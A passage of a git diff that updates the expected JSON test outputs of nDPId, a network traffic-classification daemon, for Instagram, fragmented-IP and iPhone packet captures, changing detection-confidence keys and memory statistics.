(Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":3443,"packets-processed":3442,"total-skipped-flows":0,"total-l4-payload-len":2699527,"total-not-detected-flows":1,"total-guessed-flows":7,"total-detected-flows":33,"total-detection-updates":22,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":242,"global_ts_msec":1568796268061} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":3443,"packets-processed":3442,"total-skipped-flows":0,"total-l4-payload-len":2699527,"total-not-detected-flows":1,"total-guessed-flows":7,"total-detected-flows":33,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":241,"global_ts_msec":1568796268061} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3443/3442 ~~ skipped flows.............: 0 @@ -248,9 +247,9 @@ ~~ total active/idle flows...: 38/38 ~~ total timeout flows.......: 5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6570679 bytes -~~ total memory freed........: 6570679 bytes -~~ total allocations/frees...: 121841/121841 +~~ total memory allocated....: 6238351 bytes +~~ total memory freed........: 6238351 bytes +~~ total allocations/frees...: 124558/124558 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2417 chars diff --git a/test/results/ip_fragmented_garbage.pcap.out b/test/results/ip_fragmented_garbage.pcap.out index cf0fd76ec..eb2197d52 100644 --- a/test/results/ip_fragmented_garbage.pcap.out +++ b/test/results/ip_fragmented_garbage.pcap.out @@ -18221,9 +18221,9 @@ ~~ total active/idle flows...: 29/29 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5899152 bytes -~~ total memory freed........: 5899152 bytes -~~ total allocations/frees...: 118226/118226 +~~ total memory allocated....: 6032786 bytes +~~ total memory freed........: 6032786 bytes +~~ total allocations/frees...: 120988/120988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 222 chars ~~ json string max len.......: 609 chars diff --git a/test/results/iphone.pcap.out b/test/results/iphone.pcap.out index 017bacf23..192dab4b1 100644 --- a/test/results/iphone.pcap.out +++ b/test/results/iphone.pcap.out @@ -2,22 +2,22 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1582454552576} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454552576,"flow_last_seen":1582454552576,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454552576,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454552576,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454552576,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIaAFkAAEAR8inAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454552576,"flow_last_seen":1582454552576,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454552576,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454552576,"flow_last_seen":1582454552576,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454552576,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553219,"flow_last_seen":1582454553219,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454553219,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454553219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454553219,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeCUAAP8RQoAAAAAA\/\/\/\/\/wBEAEMBNI0tAQEGAHhURwkAGwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553219,"flow_last_seen":1582454553219,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454553219,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} +00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553219,"flow_last_seen":1582454553219,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454553219,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553606,"flow_last_seen":1582454553606,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553606,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01985{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454553606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1199,"pkt_l4_len":1165,"thread_ts_msec":1582454553606,"pkt":"AQBeAAD7xiwDYGpkCABFAASh9MAAAP8RHubAqAIB4AAA+xTpFOkEjReaAACEAAAAAB4AAAALDUx1Y2HigJlzIGlNYWMGX29kaXNrBF90Y3AFbG9jYWwAABCAAQAAEZQANDNzeXM9d2FNQT1DNDoyQzowMzowNjo0OTpGRSxhZFZGPTB4NCxhZERUPTB4MyxhZENDPTAJX3NlcnZpY2VzB19kbnMtc2QEX3VkcMAmAAwAAQAAEZQAAsAawBoADAABAAARlAACwAwNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AIQAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xNwlfa2VyYmVyb3MKTHVjYXMtaU1hY8AmABAAAQAAEZQAMzJMS0RDOlNIQTEuNDkyNDgwQzNFQTgyODI3NzFBMEQyODhGMTExRUY5RTc1MUY5NUE2Mw1MdWNh4oCZcyBpTWFjBF9zbWLAIQAQgAEAABGUAAEAwGsADAABAAARlAACwUHBQQAMAAEAABGUAALBMw1MdWNh4oCZcyBpTWFjC19hZnBvdmVydGNwwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsF9wX0ADAABAAARlAACwW8NTHVjYeKAmXMgaU1hYwRfc3NowCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsHAwcAADAABAAARlAACwbINTHVjYeKAmXMgaU1hYwlfc2Z0cC1zc2jAIQAQgAEAABGUAAEAwGsADAABAAARlAACwfzB\/AAMAAEAABGUAALB7sAMACGAAQAAAHgACAAAAADAAMDpwTMAIYABAAAAeAAIAAAAAAG9wOnBbwAhgAEAAAB4AAgAAAAAAiTA6cGyACGAAQAAAHgACAAAAAAAFsDpwe4AIYABAAAAeAAIAAAAAAAWwOkNTHVjYeKAmXMgaU1hYwRfbmZzwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsKhwqEADAABAAARlAACwpPCkwAhgAEAAAB4AAgAAAAACAHA6Q1MdWNh4oCZcyBpTWFjD19jb21wYW5pb24tbGlua8AhABCAAQAAEZQAWBZycEJBPTU5OjUxOjAyOjJGOkE0OkZGCnJwVnI9MTUyLjERcnBIST0wNzE2ZDA1OTQ0YWYRcnBITj04YjUzMjQzNTlkN2QRcnBIQT0yOGQ0YmVkNTE3ODDAawAMAAEAABGUAALC8cLxAAwAAQAAEZQAAsLjwuMAIYABAAAAeAAIAAAAAMADwOnA6QABgAEAAAB4AATAqAIBwOkAHIABAAAAeAAQ\/oAAAAAAAADELAP\/\/mBqZMAMAC+AAQAAEZQACcAMAAUAAIAAQMEzAC+AAQAAEZQACcEzAAUAAIAAQMFvAC+AAQAAEZQACcFvAAUAAIAAQMGyAC+AAQAAEZQACcGyAAUAAIAAQMHuAC+AAQAAEZQACcHuAAUAAIAAQMKTAC+AAQAAEZQACcKTAAUAAIAAQMLjAC+AAQAAEZQACcLjAAUAAIAAQMDpAC+AAQAAAHgACMDpAARAAAAIAAApBaAAABGUABIABAAOAADELAMGSf7GLANgamQ="} 